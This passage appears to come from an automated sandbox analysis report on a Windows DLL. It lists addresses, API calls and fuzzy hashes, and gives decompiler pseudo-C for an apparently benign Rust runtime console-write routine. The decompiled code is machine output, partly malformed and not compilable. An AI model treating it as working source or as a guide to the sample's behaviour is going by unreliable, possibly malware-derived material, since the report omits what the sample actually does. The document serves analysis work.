                          0x6e4c4198
                          0x6e4c419d
                          0x6e4c43c1
                          0x6e4c43c3
                          0x6e4c43c5
                          0x6e4c43c8
                          0x6e4c43cb
                          0x6e4c43d7
                          0x6e4c43da
                          0x6e4c43dc
                          0x6e4c43dd
                          0x6e4c43e1
                          0x6e4c43e4
                          0x6e4c43e4
                          0x6e4c43e8
                          0x6e4c43e8
                          0x6e4c43e8
                          0x6e4c43eb
                          0x6e4c43eb
                          0x6e4c41a3
                          0x6e4c41a3
                          0x6e4c41a6
                          0x6e4c41a8
                          0x6e4c41ab
                          0x6e4c41ad
                          0x6e4c41b1
                          0x6e4c41b2
                          0x6e4c41b3
                          0x6e4c41b7
                          0x6e4c41bc
                          0x6e4c41c6
                          0x6e4c41cb
                          0x6e4c41ce
                          0x6e4c41ce
                          0x6e4c41d1
                          0x6e4c41d4
                          0x6e4c41d6
                          0x6e4c41d9
                          0x6e4c41e2
                          0x6e4c41e6
                          0x6e4c41e7
                          0x6e4c41ee
                          0x6e4c41f4
                          0x6e4c41fc
                          0x6e4c4207
                          0x6e4c420c
                          0x6e4c4217
                          0x6e4c421c
                          0x6e4c4222
                          0x6e4c422b
                          0x6e4c4285
                          0x6e4c4285
                          0x6e4c4310
                          0x6e4c4315
                          0x6e4c4327
                          0x6e4c432c
                          0x6e4c432f
                          0x6e4c4334
                          0x6e4c434f
                          0x6e4c4432
                          0x6e4c4438
                          0x6e4c4355
                          0x6e4c4355
                          0x6e4c4360
                          0x6e4c4362
                          0x6e4c4365
                          0x6e4c436e
                          0x6e4c4378
                          0x00000000
                          0x6e4c437a
                          0x6e4c437c
                          0x6e4c437e
                          0x6e4c4397
                          0x00000000
                          0x6e4c439d
                          0x6e4c43a1
                          0x6e4c43a7
                          0x6e4c43aa
                          0x6e4c43b0
                          0x6e4c43b3
                          0x00000000
                          0x6e4c43b3
                          0x6e4c43a1
                          0x6e4c4397
                          0x6e4c4378
                          0x6e4c436e
                          0x6e4c434f
                          0x6e4c4334
                          0x6e4c4222
                          0x6e4c419d
                          0x6e4c4173
                          0x00000000
                          0x6e4c43b6
                          0x6e4c43b6
                          0x6e4c43bf
                          0x6e4c443a
                          0x6e4c443f
                          0x6e4c4447
                          0x6e4c4448
                          0x6e4c4449
                          0x6e4c4455
                          0x00000000

                          APIs
                          • GetConsoleOutputCP.KERNEL32(F06451CF,?,00000000,?), ref: 6E4C40EC
                            • Part of subcall function 6E4C19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E4C3B22,?,00000000,-00000008), ref: 6E4C1A5F
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E4C4347
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E4C438F
                          • GetLastError.KERNEL32 ref: 6E4C4432
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: d0309045f5ea20ba1a4eb3f8a82a960be0b9682ac81f71c02682416e3a9b2d9e
                          • Instruction ID: aacc28a07e96393ef641faac9e16019ebfc68c5675c023d920ab612c3da50a78
                          • Opcode Fuzzy Hash: d0309045f5ea20ba1a4eb3f8a82a960be0b9682ac81f71c02682416e3a9b2d9e
                          • Instruction Fuzzy Hash: 78D17879E002589FCB01CFE8D980AEDBBB5FF49B44F18452AE855EB341D730A942CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B2620, Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                          Download Yara Rule
                          C-Code - Quality: 56%
                          			E6E4B2620(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi, signed char _a1, char _a2, char _a8, signed int _a8212, void* _a8216, char _a1850652188) {
				signed int _v0;
				char _v2;
				void* _v4;
				long _v8;
				long _v12;
				signed char* _v16;
				long _v20;
				intOrPtr _v28;
				char _v36;
				char _v40;
				long _v44;
				char* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				long _v64;
				char* _v68;
				long _v76;
				long _v80;
				char _v84;
				long _v88;
				intOrPtr _v92;
				long _v100;
				long _v104;
				char _v108;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				void* __ebp;
				signed short* _t120;
				signed char _t122;
				void** _t124;
				void* _t129;
				void* _t135;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t146;
				void* _t147;
				long _t156;
				signed short _t161;
				void* _t164;
				signed int _t167;
				signed int _t168;
				signed int _t172;
				signed int _t173;
				DWORD* _t177;
				unsigned int _t178;
				void* _t180;
				unsigned int _t182;
				void* _t183;
				signed char _t185;
				signed int _t186;
				void* _t192;
				long _t193;
				signed int _t196;
				void** _t197;
				void* _t205;
				DWORD* _t206;
				signed char _t208;
				signed int _t212;
				signed short _t215;
				long* _t219;
				long _t221;
				long _t226;
				signed char _t228;
				intOrPtr _t236;
				signed int _t237;
				signed short _t238;
				void* _t245;
				void* _t247;
				signed int _t249;
				signed int _t250;
				unsigned int _t253;
				signed int _t256;
				void* _t258;
				long _t259;
				char* _t260;
				void* _t261;
				char* _t264;
				void* _t271;
				void* _t272;
				void** _t273;
				void* _t276;
				signed short _t277;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t288;
				void* _t289;
				void* _t290;
				signed int _t296;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t306;
				void* _t307;
				intOrPtr _t308;
				void* _t319;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				E6E4BA000(0x2010);
				_t258 = _a8216;
				_t288 = _a8212;
				_t271 =  &_v0;
				_v4 = __edx;
				_v8 = __ecx;
				E6E4BC310(_t258, _t271, 0, 0x2000);
				_t302 = _t301 + 0xc;
				_t177 = _t288 + _t258;
				_t192 = 0x2000;
				_t259 = 0;
				_v16 = _t177;
				if(0 == 0) {
					L4:
					__eflags = _t288 - _t177;
					if(_t288 == _t177) {
						L27:
						__eflags = _t259 - 0x1001;
						if(__eflags >= 0) {
							goto L46;
						} else {
							goto L28;
						}
					} else {
						_t185 = _v0;
						_t7 =  &_a1; // 0x1
						_t167 = _t7;
						_t249 = _t185 & 0x000000ff;
						__eflags = _t185;
						if(_t185 < 0) {
							_t281 = _v16;
							__eflags = _t167 - _t281;
							if(_t167 == _t281) {
								_t168 = 0;
								_t288 = _t281;
								_t250 = _t249 & 0x0000001f;
								__eflags = _t185 - 0xdf;
								if(_t185 > 0xdf) {
									goto L10;
								} else {
									goto L15;
								}
							} else {
								_t288 =  &_a2;
								_t168 = _a1 & 0x3f;
								_t250 = _t249 & 0x0000001f;
								__eflags = _t185 - 0xdf;
								if(_t185 <= 0xdf) {
									L15:
									_t256 = _t250 << 6;
									goto L18;
								} else {
									L10:
									_t282 = _v16;
									__eflags = _t288 - _t282;
									if(_t288 == _t282) {
										_t288 = _t282;
										_t168 = _t168 << 6;
										__eflags = _t185 - 0xf0;
										if(_t185 >= 0xf0) {
											goto L12;
										} else {
											goto L17;
										}
									} else {
										_t288 =  &_a1;
										_t168 = _t168 << 0x00000006 | _v0 & 0x3f;
										__eflags = _t185 - 0xf0;
										if(_t185 < 0xf0) {
											L17:
											_t256 = _t250 << 0xc;
											__eflags = _t256;
											L18:
											_t177 = _v16;
											_t249 = _t256 | _t168;
											_t271 =  &_v0;
											goto L21;
										} else {
											L12:
											_t284 = _v16;
											__eflags = _t288 - _t284;
											if(_t288 == _t284) {
												_t186 = 0;
												__eflags = 0;
												_t288 = _t284;
											} else {
												_t288 =  &_a1;
												_t186 = _v0 & 0x3f;
											}
											_t271 =  &_v0;
											_t172 = _t168 << 0x00000006 | (_t250 & 0x00000007) << 0x00000012 | _t186;
											_t177 = _v16;
											__eflags = _t172 - 0x110000;
											_t249 = _t172;
											if(_t172 == 0x110000) {
												goto L27;
											} else {
												L21:
												__eflags = _t249 - 0xffff;
												if(__eflags <= 0) {
													goto L2;
												} else {
													_t253 = _t249 + 0xffff0000;
													_t173 = _t253 & 0x000003ff | 0x0000dc00;
													_t249 = _t253 >> 0x0000000a | 0x0000d800;
													_t177 = _v16;
													__eflags = _t192;
													if(__eflags == 0) {
														goto L26;
													} else {
														goto L24;
													}
												}
											}
										}
									}
								}
							}
						} else {
							_t177 = _v16;
							_t288 = _t167;
							_t173 = 0;
							__eflags = _t192;
							if(__eflags != 0) {
								goto L24;
							} else {
								goto L26;
							}
						}
					}
				} else {
					L2:
					_t173 = 0;
					if(_t192 != 0) {
						L24:
						 *(_t302 + 0x10 + _t259 * 2) = _t249;
						_t259 = _t259 + 1;
						_t192 = _t192 + 0xfffffffe;
						_t249 = _t173;
						__eflags = _t249;
						if(__eflags != 0) {
							goto L2;
						} else {
							goto L4;
						}
					} else {
						L26:
						_t259 = 0x1000;
						L28:
						_t177 =  &_v12;
						_v12 = 0;
						if(WriteConsoleW(_v4, _t271, _t259, _t177, 0) == 0) {
							_t156 = GetLastError();
							_t219 = _v8;
							_t219[2] = _t156;
							_t219[1] = 0;
							 *_t219 = 1;
							goto L44;
						} else {
							_t288 = _v12;
							_t245 = _a8216;
							_t319 = _t288 - _t259;
							if(_t319 == 0) {
								L43:
								_t156 = _v8;
								 *((intOrPtr*)(_t156 + 4)) = _t245;
								 *_t156 = 0;
								L44:
								return _t156;
							} else {
								if(_t319 >= 0) {
									E6E4C6CA0(_t177, _t288, _t259, _t259, _t271, __eflags, 0x6e4ee124);
									_t302 = _t302 + 4;
									asm("ud2");
									L46:
									_t193 = _t259;
									_t226 = 0x1000;
									_push(0x6e4ee114);
									goto L48;
								} else {
									if((( *(_t302 + 0x10 + _t288 * 2) & 0x0000ffff) + 0x00002312 & 0x0000ffff) < 0x312) {
										_t164 = _t302 + 0x10 + _t288 * 2;
										_t288 =  &_a1;
										_v12 = 0;
										if(WriteConsoleW(_v4, _t164, 1, _t177, 0) == 0) {
											GetLastError();
										}
									}
									if(_t288 > _t259) {
										_t193 = _t288;
										_t226 = _t259;
										_push(0x6e4ee134);
										L48:
										E6E4C6DB0(_t177, _t193, _t226, _t259, _t271, __eflags);
										_t303 = _t302 + 4;
										asm("ud2");
										asm("int3");
										_t304 = _t303 - 8;
										__eflags =  *_t193 - 1;
										if(__eflags == 0) {
											asm("movsd xmm0, [ecx+0x4]");
											asm("movsd [esp], xmm0");
											E6E4C6EE0(_t177, "called `Result::unwrap()` on an `Err` value", 0x2b, __eflags, _t304, 0x6e4ed09c, 0x6e4ee104);
											asm("ud2");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t288);
											_push(_t177);
											_push(_t259);
											_push(_t271);
											_t306 = _t304 + 0xc - 0x80;
											_t228 =  *_v16;
											_t120 =  *_v20;
											__eflags = _t228 & 0x00000010;
											if((_t228 & 0x00000010) != 0) {
												_t196 =  *_t120;
												_t272 = 0;
												_t260 =  &_v40;
												_t289 = 0x30;
												_t178 = _t196;
												asm("o16 nop [eax+eax]");
												do {
													_t178 = _t178 >> 4;
													_t122 = _t196 & 0x0000000f;
													__eflags = _t122 - 0xa;
													_t230 =  <  ? 0x30 : 0x57;
													_t272 = _t272 + 1;
													_t231 = ( <  ? 0x30 : 0x57) + _t122;
													__eflags = _t196 - 0xf;
													_t196 = _t178;
													 *((char*)(_t260 - 1)) = ( <  ? 0x30 : 0x57) + _t122;
													_t260 = _t260 - 1;
												} while (__eflags > 0);
												goto L65;
											} else {
												__eflags = _t228 & 0x00000020;
												if((_t228 & 0x00000020) != 0) {
													_t237 =  *_t120;
													_t276 = 0;
													__eflags = 0;
													_t264 =  &_v40;
													_t289 = 0x30;
													_t182 = _t237;
													asm("o16 nop [cs:eax+eax]");
													do {
														_t182 = _t182 >> 4;
														_t208 = _t237 & 0x0000000f;
														__eflags = _t208 - 0xa;
														_t144 =  <  ? 0x30 : 0x37;
														_t276 = _t276 + 1;
														_t145 = ( <  ? 0x30 : 0x37) + _t208;
														__eflags = _t237 - 0xf;
														_t237 = _t182;
														 *((char*)(_t264 - 1)) = ( <  ? 0x30 : 0x37) + _t208;
														_t264 = _t264 - 1;
													} while (__eflags > 0);
													L65:
													_t124 = 0x80 - _t272;
													__eflags = 0x80 - 0x81;
													if(0x80 >= 0x81) {
														_t197 = _t124;
														E6E4C6D40(_t178, _t197, 0x80, _t260, _t272, 0x80 - 0x81, 0x6e4eb60c);
														_t307 = _t306 + 4;
														asm("ud2");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_t290 = _t307;
														_t308 = _t307 - 0x5c;
														_v200 = _t308;
														_v188 = 0xffffffff;
														_v192 = E6E4B3C10;
														_t273 = _t197;
														_v196 =  *[fs:0x0];
														 *[fs:0x0] =  &_v196;
														__imp__AcquireSRWLockExclusive(0x6e4fadb4, _t272, _t260, _t178, _t289);
														_v204 = 0x6e4fadb4;
														_t261 =  *_t273;
														__eflags = _t261;
														if(_t261 != 0) {
															L83:
															__imp__ReleaseSRWLockExclusive(_v36);
															 *[fs:0x0] = _v28;
															return _t261;
														} else {
															_t82 =  &(_t273[1]); // 0x6e4b3100
															_t180 =  *_t82;
															_t129 = TlsAlloc();
															__eflags = _t129 - 0xffffffff;
															if(__eflags == 0) {
																_v20 = 0;
																E6E4C6E20(_t180, "assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi", 0x2e, _t261, _t273, __eflags, 0x6e4ede0c);
																_t308 = _t308 + 4;
																asm("ud2");
																goto L85;
															} else {
																_t261 = _t129;
																__eflags = _t180;
																if(_t180 == 0) {
																	L82:
																	__eflags = _t261;
																	 *_t273 = _t261;
																	if(__eflags == 0) {
																		L85:
																		_v108 = 0x6e4ed74c;
																		_v104 = 1;
																		_v100 = 0;
																		_v92 = 0x6e4ecd60;
																		_v84 = 0x6e4ed5a4;
																		_v80 = 2;
																		_v40 = 0;
																		_v44 = 0;
																		_v88 = 0;
																		_v76 = 0;
																		_v20 = 0;
																		_v60 =  &_v108;
																		_v56 = E6E4A22E0;
																		_v68 =  &_v60;
																		_v64 = 1;
																		_v52 = E6E4AD2A0( &_v44, __eflags);
																		_v48 =  &_v84;
																		E6E4AD460( &_v52);
																		asm("int 0x29");
																		asm("ud2");
																		goto L86;
																	} else {
																		goto L83;
																	}
																} else {
																	_t139 =  *0x6e4fadc8; // 0xb00000
																	__eflags = _t139;
																	if(_t139 != 0) {
																		L79:
																		_t140 = HeapAlloc(_t139, 0, 0xc);
																		__eflags = _t140;
																		if(__eflags == 0) {
																			goto L86;
																		} else {
																			 *_t140 = _t180;
																			 *(_t140 + 4) = _t261;
																			 *(_t140 + 8) = 0;
																			_t205 = _t140;
																			_t141 =  *0x6e4fadcc; // 0x0
																			do {
																				 *((intOrPtr*)(_t205 + 8)) = _t141;
																				asm("lock cmpxchg [0x6e4fadcc], ecx");
																			} while (__eflags != 0);
																			goto L82;
																		}
																	} else {
																		_t139 = GetProcessHeap();
																		__eflags = _t139;
																		if(__eflags == 0) {
																			L86:
																			_t135 = E6E4C6C30(_t180, 0xc, 4, _t261, _t273, __eflags);
																			asm("ud2");
																			_push(_t290);
																			__eflags =  &_a8;
																			return E6E4AC870(_t135,  &_v36);
																		} else {
																			 *0x6e4fadc8 = _t139;
																			goto L79;
																		}
																	}
																}
															}
														}
													} else {
														_t206 = _v16;
														_t236 = 0x6e4ecc17;
														_push(_t272);
														_push(_t260);
														_push(2);
														goto L71;
													}
												} else {
													_t277 =  *_t120;
													_t146 = 0x27;
													__eflags = _t277 - 0x2710;
													if(_t277 < 0x2710) {
														_t238 = _t277;
														__eflags = _t238 - 0x63;
														if(_t238 > 0x63) {
															goto L57;
														} else {
															goto L58;
														}
														goto L87;
													} else {
														_t183 = 0x27;
														do {
															_t238 = _t277 * 0xd1b71759 >> 0x20 >> 0xd;
															_t215 = _t277 - _t238 * 0x2710;
															_t296 = ((_t215 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
															_t50 = _t183 - 4; // 0x23
															_t146 = _t50;
															__eflags = _t277 - 0x5f5e0ff;
															_t277 = _t238;
															 *((short*)(_t306 + _t183 - 4)) =  *(_t296 +  &_a1850652188) & 0x0000ffff;
															 *((short*)(_t306 + _t183 - 2)) =  *((_t215 - _t296 * 0x00000064 & 0x0000ffff) + (_t215 - _t296 * 0x00000064 & 0x0000ffff) + 0x6e4eb61c) & 0x0000ffff;
															_t183 = _t146;
														} while (__eflags > 0);
														__eflags = _t238 - 0x63;
														if(_t238 > 0x63) {
															L57:
															_t212 = ((_t238 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
															 *((short*)(_t306 + _t146 - 2)) =  *((_t238 - _t212 * 0x00000064 & 0x0000ffff) + (_t238 - _t212 * 0x00000064 & 0x0000ffff) + 0x6e4eb61c) & 0x0000ffff;
															_t146 = _t146 + 0xfffffffe;
															__eflags = _t146;
															_t238 = _t212;
														}
													}
													L58:
													__eflags = _t238 - 0xa;
													if(_t238 >= 0xa) {
														 *((short*)(_t306 + _t146 - 2)) =  *(_t238 + _t238 + 0x6e4eb61c) & 0x0000ffff;
														_t147 = _t146 + 0xfffffffe;
														__eflags = _t147;
													} else {
														 *((char*)(_t306 + _t146 - 1)) = _t238 + 0x30;
														_t147 = _t146 - 1;
													}
													_t206 = _v16;
													_t236 = 0x6e4ecd60;
													__eflags = 0x27;
													_push(0x27 - _t147);
													_push(_t306 + _t147);
													_push(0);
													L71:
													return E6E4A1AA0(_t206, _t236);
												}
											}
										} else {
											return  *((intOrPtr*)(_t193 + 4));
										}
									} else {
										if(_t288 == 0) {
											_t245 = 0;
											__eflags = 0;
										} else {
											_t247 = 0;
											do {
												_t161 =  *_t271 & 0x0000ffff;
												_t221 = 1;
												if(_t161 >= 0x80) {
													_t221 = 2;
													_t247 = _t245;
													if((_t161 & 0x0000ffff) > 0x7ff) {
														_t221 = (0 | (_t161 + 0x00002312 & 0x0000ffff) - 0x00000312 >= 0x00000000) + (0 | (_t161 + 0x00002312 & 0x0000ffff) - 0x00000312 >= 0x00000000) + 1;
													}
												}
												_t245 = _t247 + _t221;
												_t271 = _t271 + 2;
											} while ( &_v2 != 0);
										}
										goto L43;
									}
								}
							}
						}
					}
				}
				L87:
			}









































































































                          0x6e4b2621
                          0x6e4b2622
                          0x6e4b2623
                          0x6e4b2629
                          0x6e4b262e
                          0x6e4b2635
                          0x6e4b263c
                          0x6e4b2640
                          0x6e4b2644
                          0x6e4b2650
                          0x6e4b2655
                          0x6e4b2658
                          0x6e4b265e
                          0x6e4b2663
                          0x6e4b2665
                          0x6e4b266b
                          0x6e4b2680
                          0x6e4b2680
                          0x6e4b2682
                          0x6e4b2790
                          0x6e4b2790
                          0x6e4b2796
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4b2688
                          0x6e4b2688
                          0x6e4b268b
                          0x6e4b268b
                          0x6e4b268e
                          0x6e4b2691
                          0x6e4b2693
                          0x6e4b26a9
                          0x6e4b26ac
                          0x6e4b26ae
                          0x6e4b26ec
                          0x6e4b26ee
                          0x6e4b26f0
                          0x6e4b26f3
                          0x6e4b26f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4b26b0
                          0x6e4b26b4
                          0x6e4b26b7
                          0x6e4b26ba
                          0x6e4b26bd
                          0x6e4b26c0
                          0x6e4b26f8
                          0x6e4b26f8
                          0x00000000
                          0x6e4b26c2
                          0x6e4b26c2
                          0x6e4b26c2
                          0x6e4b26c5
                          0x6e4b26c7
                          0x6e4b26fd
                          0x6e4b2704
                          0x6e4b2706
                          0x6e4b2709
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4b26c9
                          0x6e4b26cd
                          0x6e4b26d4
                          0x6e4b26d6
                          0x6e4b26d9
                          0x6e4b270b
                          0x6e4b270b
                          0x6e4b270b
                          0x6e4b270e
                          0x6e4b270e
                          0x6e4b2711
                          0x6e4b2713
                          0x00000000
                          0x6e4b26db
                          0x6e4b26db
                          0x6e4b26db
                          0x6e4b26de
                          0x6e4b26e0
                          0x6e4b2719
                          0x6e4b2719
                          0x6e4b271b
                          0x6e4b26e2
                          0x6e4b26e6
                          0x6e4b26e7
                          0x6e4b26e7
                          0x6e4b2723
                          0x6e4b272c
                          0x6e4b272e
                          0x6e4b2731
                          0x6e4b2736
                          0x6e4b2738
                          0x00000000
                          0x6e4b273a
                          0x6e4b273a
                          0x6e4b273a
                          0x6e4b2740
                          0x00000000
                          0x6e4b2746
                          0x6e4b2746
                          0x6e4b2763
                          0x6e4b2765
                          0x6e4b2767
                          0x6e4b276a
                          0x6e4b276c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4b276c
                          0x6e4b2740
                          0x6e4b2738
                          0x6e4b26d9
                          0x6e4b26c7
                          0x6e4b26c0
                          0x6e4b2695
                          0x6e4b2695
                          0x6e4b2698
                          0x6e4b269a
                          0x6e4b269c
                          0x6e4b269e
                          0x00000000
                          0x6e4b26a4
                          0x00000000
                          0x6e4b26a4
                          0x6e4b269e
                          0x6e4b2693
                          0x6e4b2670
                          0x6e4b2670
                          0x6e4b2670
                          0x6e4b2674
                          0x6e4b2770
                          0x6e4b2770
                          0x6e4b2775
                          0x6e4b2776
                          0x6e4b2779
                          0x6e4b277b
                          0x6e4b277e
                          0x00000000
                          0x6e4b2784
                          0x00000000
                          0x6e4b2784
                          0x6e4b267a
                          0x6e4b2789
                          0x6e4b2789
                          0x6e4b279c
                          0x6e4b279c
                          0x6e4b27a0
                          0x6e4b27b9
                          0x6e4b2875
                          0x6e4b287b
                          0x6e4b287f
                          0x6e4b2882
                          0x6e4b2889
                          0x00000000
                          0x6e4b27bf
                          0x6e4b27bf
                          0x6e4b27c3
                          0x6e4b27ca
                          0x6e4b27cc
                          0x6e4b2893
                          0x6e4b2893
                          0x6e4b2897
                          0x6e4b289a
                          0x6e4b28a0
                          0x6e4b28aa
                          0x6e4b27d2
                          0x6e4b27d2
                          0x6e4b28b4
                          0x6e4b28b9
                          0x6e4b28bc
                          0x6e4b28be
                          0x6e4b28be
                          0x6e4b28c0
                          0x6e4b28c5
                          0x00000000
                          0x6e4b27d8
                          0x6e4b27ea
                          0x6e4b27ec
                          0x6e4b27f0
                          0x6e4b27f1
                          0x6e4b280b
                          0x6e4b280d
                          0x6e4b280d
                          0x6e4b280b
                          0x6e4b2815
                          0x6e4b28cc
                          0x6e4b28ce
                          0x6e4b28d0
                          0x6e4b28d5
                          0x6e4b28d5
                          0x6e4b28da
                          0x6e4b28dd
                          0x6e4b28df
                          0x6e4b28e0
                          0x6e4b28e3
                          0x6e4b28e6
                          0x6e4b28f2
                          0x6e4b2903
                          0x6e4b2913
                          0x6e4b291b
                          0x6e4b291d
                          0x6e4b291e
                          0x6e4b291f
                          0x6e4b2920
                          0x6e4b2921
                          0x6e4b2922
                          0x6e4b2923
                          0x6e4b2924
                          0x6e4b2938
                          0x6e4b293a
                          0x6e4b293c
                          0x6e4b293f
                          0x6e4b2a05
                          0x6e4b2a07
                          0x6e4b2a09
                          0x6e4b2a10
                          0x6e4b2a15
                          0x6e4b2a17
                          0x6e4b2a20
                          0x6e4b2a22
                          0x6e4b2a2a
                          0x6e4b2a2c
                          0x6e4b2a2e
                          0x6e4b2a31
                          0x6e4b2a32
                          0x6e4b2a34
                          0x6e4b2a37
                          0x6e4b2a39
                          0x6e4b2a3c
                          0x6e4b2a3c
                          0x00000000
                          0x6e4b2945
                          0x6e4b2945
                          0x6e4b2948
                          0x6e4b2a43
                          0x6e4b2a45
                          0x6e4b2a45
                          0x6e4b2a47
                          0x6e4b2a4e
                          0x6e4b2a53
                          0x6e4b2a55
                          0x6e4b2a60
                          0x6e4b2a62
                          0x6e4b2a6a
                          0x6e4b2a6d
                          0x6e4b2a70
                          0x6e4b2a73
                          0x6e4b2a74
                          0x6e4b2a76
                          0x6e4b2a79
                          0x6e4b2a7b
                          0x6e4b2a7e
                          0x6e4b2a7e
                          0x6e4b2a83
                          0x6e4b2a88
                          0x6e4b2a8a
                          0x6e4b2a8f
                          0x6e4b2af0
                          0x6e4b2afc
                          0x6e4b2b01
                          0x6e4b2b04
                          0x6e4b2b06
                          0x6e4b2b07
                          0x6e4b2b08
                          0x6e4b2b09
                          0x6e4b2b0a
                          0x6e4b2b0b
                          0x6e4b2b0c
                          0x6e4b2b0d
                          0x6e4b2b0e
                          0x6e4b2b0f
                          0x6e4b2b11
                          0x6e4b2b16
                          0x6e4b2b19
                          0x6e4b2b1c
                          0x6e4b2b23
                          0x6e4b2b2a
                          0x6e4b2b36
                          0x6e4b2b39
                          0x6e4b2b44
                          0x6e4b2b4a
                          0x6e4b2b51
                          0x6e4b2b53
                          0x6e4b2b55
                          0x6e4b2bc5
                          0x6e4b2bc8
                          0x6e4b2bd1
                          0x6e4b2be0
                          0x6e4b2b57
                          0x6e4b2b57
                          0x6e4b2b57
                          0x6e4b2b5a
                          0x6e4b2b60
                          0x6e4b2b63
                          0x6e4b2be1
                          0x6e4b2bf7
                          0x6e4b2bfc
                          0x6e4b2bff
                          0x00000000
                          0x6e4b2b65
                          0x6e4b2b65
                          0x6e4b2b67
                          0x6e4b2b69
                          0x6e4b2bbd
                          0x6e4b2bbf
                          0x6e4b2bc1
                          0x6e4b2bc3
                          0x6e4b2c01
                          0x6e4b2c0a
                          0x6e4b2c11
                          0x6e4b2c18
                          0x6e4b2c1f
                          0x6e4b2c26
                          0x6e4b2c2d
                          0x6e4b2c34
                          0x6e4b2c38
                          0x6e4b2c3f
                          0x6e4b2c46
                          0x6e4b2c4d
                          0x6e4b2c54
                          0x6e4b2c5a
                          0x6e4b2c61
                          0x6e4b2c64
                          0x6e4b2c73
                          0x6e4b2c76
                          0x6e4b2c79
                          0x6e4b2c83
                          0x6e4b2c85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4b2b6b
                          0x6e4b2b6b
                          0x6e4b2b70
                          0x6e4b2b72
                          0x6e4b2b86
                          0x6e4b2b8b
                          0x6e4b2b90
                          0x6e4b2b92
                          0x00000000
                          0x6e4b2b98
                          0x6e4b2b98
                          0x6e4b2b9a
                          0x6e4b2b9d
                          0x6e4b2ba4
                          0x6e4b2ba6
                          0x6e4b2bb0
                          0x6e4b2bb0
                          0x6e4b2bb3
                          0x6e4b2bb3
                          0x00000000
                          0x6e4b2bb0
                          0x6e4b2b74
                          0x6e4b2b74
                          0x6e4b2b79
                          0x6e4b2b7b
                          0x6e4b2c87
                          0x6e4b2c91
                          0x6e4b2c96
                          0x6e4b2ca0
                          0x6e4b2ca4
                          0x6e4b2cb3
                          0x6e4b2b81
                          0x6e4b2b81
                          0x00000000
                          0x6e4b2b81
                          0x6e4b2b7b
                          0x6e4b2b72
                          0x6e4b2b69
                          0x6e4b2b63
                          0x6e4b2a91
                          0x6e4b2a91
                          0x6e4b2a98
                          0x6e4b2a9d
                          0x6e4b2a9e
                          0x6e4b2a9f
                          0x00000000
                          0x6e4b2a9f
                          0x6e4b294e
                          0x6e4b294e
                          0x6e4b2950
                          0x6e4b2955
                          0x6e4b295b
                          0x6e4b2aa3
                          0x6e4b2aa5
                          0x6e4b2aa8
                          0x00000000
                          0x6e4b2aae
                          0x00000000
                          0x6e4b2aae
                          0x00000000
                          0x6e4b2961
                          0x6e4b2961
                          0x6e4b2970
                          0x6e4b2976
                          0x6e4b297f
                          0x6e4b298d
                          0x6e4b299d
                          0x6e4b299d
                          0x6e4b29a0
                          0x6e4b29a6
                          0x6e4b29b3
                          0x6e4b29b8
                          0x6e4b29bd
                          0x6e4b29bd
                          0x6e4b29c1
                          0x6e4b29c4
                          0x6e4b29c6
                          0x6e4b29d2
                          0x6e4b29e5
                          0x6e4b29ea
                          0x6e4b29ea
                          0x6e4b29ed
                          0x6e4b29ed
                          0x6e4b29c4
                          0x6e4b29ef
                          0x6e4b29ef
                          0x6e4b29f2
                          0x6e4b2abb
                          0x6e4b2ac0
                          0x6e4b2ac0
                          0x6e4b29f8
                          0x6e4b29fb
                          0x6e4b29ff
                          0x6e4b29ff
                          0x6e4b2ac3
                          0x6e4b2acf
                          0x6e4b2ad7
                          0x6e4b2ad9
                          0x6e4b2ada
                          0x6e4b2adb
                          0x6e4b2add
                          0x6e4b2aef
                          0x6e4b2aef
                          0x6e4b2948
                          0x6e4b28e8
                          0x6e4b28f1
                          0x6e4b28f1
                          0x6e4b281b
                          0x6e4b281d
                          0x6e4b2891
                          0x6e4b2891
                          0x6e4b281f
                          0x6e4b2821
                          0x6e4b283a
                          0x6e4b283a
                          0x6e4b283d
                          0x6e4b2847
                          0x6e4b284e
                          0x6e4b2859
                          0x6e4b285b
                          0x6e4b286f
                          0x6e4b286f
                          0x6e4b285b
                          0x6e4b2830
                          0x6e4b2832
                          0x6e4b2835
                          0x6e4b283a
                          0x00000000
                          0x6e4b281d
                          0x6e4b2815
